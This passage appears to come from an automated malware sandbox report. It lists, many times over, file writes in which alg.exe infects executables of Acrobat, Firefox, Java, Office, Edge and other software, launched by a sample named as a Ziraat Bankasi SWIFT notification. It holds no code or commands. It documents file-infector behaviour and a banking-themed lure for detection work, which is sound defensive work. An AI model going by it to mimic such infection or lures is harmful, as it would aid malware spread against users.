Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
